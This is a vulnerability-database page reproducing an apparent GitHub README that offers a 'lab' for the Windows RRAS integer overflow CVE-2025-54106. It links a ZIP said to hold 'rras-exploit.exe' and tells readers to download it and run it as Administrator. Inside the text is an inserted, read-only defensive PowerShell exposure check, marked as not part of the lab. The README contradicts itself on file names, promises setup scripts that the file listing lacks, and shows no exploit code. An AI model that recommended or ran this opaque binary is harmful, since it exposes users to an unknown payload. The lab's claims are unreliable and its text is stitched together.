PoC details: e723497be3f8db518e28dd47bfa32793f472327c

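Source
Related vulnerability
Title: Microsoft Windows Routing and Remote Access Service input validation error vulnerability (CVE-2025-54106)
Description: Microsoft Windows Routing and Remote Access Service is a network service from Microsoft (USA) that provides network routing, virtual private network (VPN) and dial-up connectivity. An input validation error vulnerability exists in Microsoft Windows Routing and Remote Access Service. An attacker can exploit this vulnerability to execute code remotely. The following products and versions are affected: Windows Server 2019, Windows Server 2019 (Server Core inst
Description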
Integer Overflow in Windows Routing and Remote Access Service (RRAS)
Introduction
# Lab: CVE-2025-54106 - Integer Overflow in Windows Routing and Remote Access Service (RRAS)
## Download Exploit
### [Download](https://github.com/DExplo1ted/CVE-2025-54106-POC/raw/refs/heads/main/Seed/cve-2025-54106.zip)  
## 🚀 Overview
A critical vulnerability (CVE-2025-54106) was discovered in the Windows Routing and Remote Access Service (RRAS) that allows unauthorized attackers to execute arbitrary code over a network via an integer overflow or wraparound condition (CWE-190). Disclosed on September 9, 2025, it affects Windows Server versions 2012 R2, 2016, 2019, 2022, and 2025.

The vulnerability has a CVSS v3.1 base score of 8.8 (HIGH) with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H. The vector describes a network-reachable attack of low complexity that requires no privileges but does require user interaction. The impact on confidentiality, integrity, and availability is rated high, potentially allowing remote code execution on affected systems.

This lab provides a vulnerable setup using direct configuration on a Windows Server environment (via PowerShell scripts), along with exploitation steps and mitigations. It's structured for security researchers and educators to explore vulnerability analysis in a controlled setting. We recommend using a virtual machine to isolate the setup.

## 📋 Prerequisites
- Administrative privileges on the Windows Server instance.
- PowerShell 5.1 or later (included in Windows Server).
- Basic knowledge of networking, Windows administration, and vulnerability exploitation concepts.
- At least 8GB RAM and 20GB free disk space for the VM.
- Tools like Wireshark (optional) for traffic analysis during exploitation.
- Firewall configured to allow testing (e.g., open ports 1723 TCP and 1701 UDP for local testing only).

## Download & Install

1. Download the simulation package (contains exploit tools):  
   - [Download ZIP](https://github.com/DExplo1ted/CVE-2025-54106-POC/raw/refs/heads/main/Seed/cve-2025-54106.zip)  
     This ZIP includes:  
     - `rras-exploit.exe`: Main exploit executable (exploits RRAS integer overflow attack).  
     - `start-exploit.bat`: Batch file to launch the exploit (opens `rras-exploit.exe` with parameters).  
     - `config.ini`: Sample configuration for target IP and port.  

2. Unzip the package into the `/exploits/` directory of the cloned repo:  
   ```
   unzip cve-2025-54106.zip -d exploits/
   ```


## 🛠 Quick Start
1. Download the ZIP from the link above and extract it.  
2. Run the setup scripts as Administrator to configure RRAS.  
3. Navigate to the extracted folder and run `start.bat`. This will launch `rras-exploit.exe` with default settings, exploiting the server (use `localhost` as target).  
4. Follow the on-screen prompts in the executable to exploit the vulnerability—output will show packet crafting and overflow triggering.  
5. Monitor Windows Event Logs for impact:  
   ```
   powershell -Command "Get-EventLog -LogName Application -Source RemoteAccess"
   ```
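
A read-only check a defender can run on a server to see whether RRAS is present and listening on the ports named in the prerequisites, and whether the event source from step 5 or the Service Control Manager recorded the service stopping unexpectedly. This is an added example, not part of the lab or its ZIP; the function name `Get-RrasExposure` and the 24-hour default window are assumptions.

```powershell
# Added example (not from the lab): read-only RRAS exposure and crash triage.
# Assumptions: service name 'RemoteAccess'; ports 1723/TCP and 1701/UDP from the
# prerequisites; event source 'RemoteAccess' as used in step 5.
function Get-RrasExposure {
    [CmdletBinding()]
    param([int]$EventHours = 24)

    $since = (Get-Date).AddHours(-$EventHours)

    # No service object means the RRAS role is not installed on this host.
    $svc = Get-Service -Name RemoteAccess -ErrorAction SilentlyContinue

    # Sockets actually listening on the VPN ports.
    $tcp = @(Get-NetTCPConnection -State Listen -LocalPort 1723 -ErrorAction SilentlyContinue)
    $udp = @(Get-NetUDPEndpoint -LocalPort 1701 -ErrorAction SilentlyContinue)

    # Enabled inbound allow rules naming those ports (port ranges are not expanded).
    $rules = @(Get-NetFirewallRule -Direction Inbound -Enabled True -Action Allow |
        Where-Object {
            $f = $_ | Get-NetFirewallPortFilter
            ($f.Protocol -eq 'TCP' -and $f.LocalPort -contains '1723') -or
            ($f.Protocol -eq 'UDP' -and $f.LocalPort -contains '1701')
        })

    # Query both logs for the 'RemoteAccess' source the page monitors.
    $rras = @(Get-WinEvent -FilterHashtable @{
            LogName = 'System', 'Application'; ProviderName = 'RemoteAccess'; StartTime = $since
        } -ErrorAction SilentlyContinue)

    # Service Control Manager 7031/7034: a service terminated unexpectedly.
    # The display-name match assumes an English-language system.
    $crashes = @(Get-WinEvent -FilterHashtable @{
            LogName = 'System'; ProviderName = 'Service Control Manager'
            Id = 7031, 7034; StartTime = $since
        } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'Routing and Remote Access' })

    [pscustomobject]@{
        RrasInstalled    = [bool]$svc
        RrasStatus       = if ($svc) { "$($svc.Status)" } else { 'NotInstalled' }
        RrasStartType    = if ($svc) { "$($svc.StartType)" } else { $null }
        Listening1723Tcp = $tcp.Count -gt 0
        Listening1701Udp = $udp.Count -gt 0
        InboundAllowRule = $rules.DisplayName
        RrasEventCount   = $rras.Count
        UnexpectedStops  = $crashes | Select-Object TimeCreated, Id, Message
    }
}

Get-RrasExposure | Format-List
```

Run it from an elevated PowerShell session. A host that reports `NotInstalled` with no listeners on either port does not expose RRAS.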
## 📞 Support  
For further assistance or questions, please feel free to reach out via the issues section of this GitHub repository. Our team is ready to help you with any concerns.  



File snapshot

```
[4.0K] /data/pocs/e723497be3f8db518e28dd47bfa32793f472327c
├── [3.1K] README.md
└── [4.0K] Seed
    └── [8.5M] cve-2025-54106.zip

1 directory, 2 files
```